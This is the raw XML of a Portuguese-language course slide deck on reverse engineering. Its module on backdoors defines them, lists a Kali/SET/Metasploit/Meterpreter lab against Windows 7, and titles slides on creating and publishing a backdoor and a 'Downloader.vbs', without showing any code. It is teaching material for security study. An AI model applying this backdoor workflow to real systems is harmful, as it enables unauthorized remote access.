              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>diegomaeoka@linuxmail.org</a:t>
            </a:r>
            <a:endParaRPr b="1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◇"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1"/>
              <a:t>acebook.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1"/>
              <a:t>diego.k.maeoka</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Shape 545"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461094" y="907330"/>
            <a:ext cx="604943" cy="610497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 txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2005969" y="726607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Referências</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Shape 551"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2005969" y="1371907"/>
            <a:ext cx="5277700" cy="3473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" b="1" dirty="0" err="1"/>
              <a:t>Backdoors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt" b="1" dirty="0" err="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt" b="1" dirty="0"/>
              <a:t> Firewalls de Aplicação</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> – Rodrigo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>Rubira</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> Branco</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>www.kernelhacking.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>/rodrigo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>docs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>/H2HCII.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Using the Social Engineering Toolkit (SET) to Create a Backdoor Executable</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>www.youtube.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>watch?v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>=PnuynLy0NvU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34306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Módulo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> 4 - Agenda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5508927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sz="2000" b="1" i="1" dirty="0"/>
              <a:t>AULA 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Muli" pitchFamily="2" charset="77"/>
              <a:buChar char="◇"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>O que é uma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Muli" pitchFamily="2" charset="77"/>
              <a:buChar char="◇"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Criando uma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> para análise;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Muli" pitchFamily="2" charset="77"/>
              <a:buChar char="◇"/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="18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Requisitos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> da Aula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5508927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/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>Máquina com sistema operacional Kali Linux;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>SET;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" b="1" i="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" b="1" i="1" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>Máquina com sistema operacional Windows 7 64bits;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" sz="2000" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="pt-BR" sz="1800" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Muli" pitchFamily="2" charset="77"/>
              <a:buChar char="◇"/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171886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Backdoor</a:t>
            </a:r>
            <a:endParaRPr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05A91E-EEFB-524A-B907-C5C61E203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383" y="1416050"/>
            <a:ext cx="35179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803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Backdoor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5508927" cy="3820203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450"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-BR" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Recurso utilizado por diversos malwares para garantir acesso remoto ao sistema ou à rede infectada;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Podem infectar através da exploração de falhas críticas não documentadas, falhas características de softwares desatualizados ou do firewall;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Podem ser explorados por sites maliciosos, através de vulnerabilidades existentes nos navegadores.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Podem garantir acesso completo ou parcial ao sistema;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="pt-BR" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3443541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Backdoor</a:t>
            </a:r>
            <a:endParaRPr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9AAC6C-27F0-654B-BA11-DFA1A9C53D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09" t="7885" r="12871" b="9422"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426383" y="1185684"/>
            <a:ext cx="4547287" cy="305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31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61689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Criando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1"/>
              <a:t>uma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> Backdoor</a:t>
            </a:r>
            <a:endParaRPr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DE47FB-5353-AD41-9622-7625099F6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382" y="1300183"/>
            <a:ext cx="3843527" cy="254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368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61689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Criando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1"/>
              <a:t>uma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> Backdoor</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4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BF902C7D-399A-B04A-9166-05FD6F044A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92" t="5755" r="5057" b="9418"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="1236024"/>
            <a:ext cx="4114936" cy="3241175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6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F36BAECD-E33C-3248-B521-4BD1DCFD29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047" t="4233" r="14670" b="11746"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="1237199"/>
            <a:ext cx="4114936" cy="32400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87A80D2-84D8-354F-A465-6D435547149A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="3605349"/>
            <a:ext cx="1335721" cy="17417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99E85887-514D-A544-B7B8-DEE0BD6730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406" t="5136" r="8211" b="7818"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379554" y="1237199"/>
            <a:ext cx="4208592" cy="32400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8BA0A09-3A8C-4443-B038-28CD80D3510A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="3525462"/>
            <a:ext cx="1335721" cy="12719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9F7F073D-6DFE-0744-9D25-913E8980AAC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818" t="3556" r="10695" b="6489"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379554" y="1220067"/>
            <a:ext cx="4208592" cy="32400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1116F84-1E60-EB46-94C7-75994B473C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="3617176"/>
            <a:ext cx="1335721" cy="1505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screenshot of a computer&#13;&#10;&#13;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B71B858-1B09-314F-AE5D-FD022EDFA01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544" t="3311" r="4704" b="6897"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379554" y="1220067"/>
            <a:ext cx="4208592" cy="324000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6E0C7CB-D007-FB41-B42B-D258715F3540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794316" y="4225550"/>
            <a:ext cx="2220685" cy="23451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A screen shot of a computer&#13;&#10;&#13;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B919FDA8-C4A6-FE4B-B3FF-0E5DBC23A4A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9446" t="3666" r="11105" b="6905"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379554" y="1220067"/>
            <a:ext cx="4208592" cy="3240000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4D40A9E-EB09-724B-AD31-AD532E2485F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="4225550"/>
            <a:ext cx="1994789" cy="16734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320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 animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1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6168977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Criando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1"/>
              <a:t>uma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> Backdoor</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer screen&#13;&#10;&#13;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF902C7D-399A-B04A-9166-05FD6F044A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92" t="5755" r="5057" b="9418"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="1236024"/>
            <a:ext cx="4114936" cy="324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44787"/>
      </p:ext>
    </p:extLst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4339</TotalTime>
  <Words>335</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>64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Nixie One</vt:lpstr>
      <vt:lpstr>Muli</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Imogen template</vt:lpstr>
      <vt:lpstr>Introdução à Engenharia Reversa Prof. Diego K. Maeoka</vt:lpstr>
      <vt:lpstr>Módulo 4 - Agenda</vt:lpstr>
      <vt:lpstr>Requisitos da Aula</vt:lpstr>
      <vt:lpstr>Backdoor</vt:lpstr>
      <vt:lpstr>Backdoor</vt:lpstr>
      <vt:lpstr>Backdoor</vt:lpstr>
      <vt:lpstr>Criando uma Backdoor</vt:lpstr>
      <vt:lpstr>Criando uma Backdoor</vt:lpstr>
      <vt:lpstr>Criando uma Backdoor</vt:lpstr>
      <vt:lpstr>Criando uma Backdoor</vt:lpstr>
      <vt:lpstr>Criando uma Backdoor</vt:lpstr>
      <vt:lpstr>Criando uma Backdoor</vt:lpstr>
      <vt:lpstr>Criando uma Backdoor</vt:lpstr>
      <vt:lpstr>Criando uma Backdoor</vt:lpstr>
      <vt:lpstr>Publicando a Backdoor</vt:lpstr>
      <vt:lpstr>Downloader.vbs</vt:lpstr>
      <vt:lpstr>Conexão Fechada</vt:lpstr>
      <vt:lpstr>Obrigado!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Prof.</dc:title>
  <dc:creator>oCanabrava</dc:creator>
  <cp:lastModifiedBy>DIEGO KIYOSHI MAEOKA</cp:lastModifiedBy>
  <cp:revision>79</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-18T18:09:17Z</dcterms:modified>
</cp:coreProperties>
</file>